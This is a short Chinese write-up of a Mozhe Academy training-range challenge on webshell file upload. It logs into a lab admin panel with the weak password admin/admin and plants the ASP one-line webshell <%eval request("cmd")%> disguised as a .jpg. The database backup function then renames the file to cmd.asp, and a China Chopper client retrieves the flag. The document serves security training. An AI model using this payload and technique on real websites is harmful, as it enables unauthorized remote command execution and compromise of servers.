墨者学院-WebShell文件上传漏洞分析溯源(第5题)

靶场地址:
https://www.mozhe.cn/bug/detail/OGp3KzRZUFpnVUNUZm9xcjJlN1V4dz09bW96aGUmozhe

后台登录页面路径/admin/login.asp,尝试弱口令登录,admin/admin成功登录


墨者学院-WebShell文件上传漏洞分析溯源(第5题)_第1张图片

点击文件管理-管理文章-随机选择一篇编辑,写入asp一句话木马<%eval request("cmd")%>,保存文件后缀为jpg,上传,记录上传路径

点击数据处理-数据备份,通过数据库备份来写入一句话木马,备份我们的图片,备份数据库名称为cmd.asp


墨者学院-WebShell文件上传漏洞分析溯源(第5题)_第2张图片

墨者学院-WebShell文件上传漏洞分析溯源(第5题)_第3张图片

接着上菜刀找key即可


墨者学院-WebShell文件上传漏洞分析溯源(第5题)_第4张图片

你可能感兴趣的:(墨者学院-WebShell文件上传漏洞分析溯源(第5题))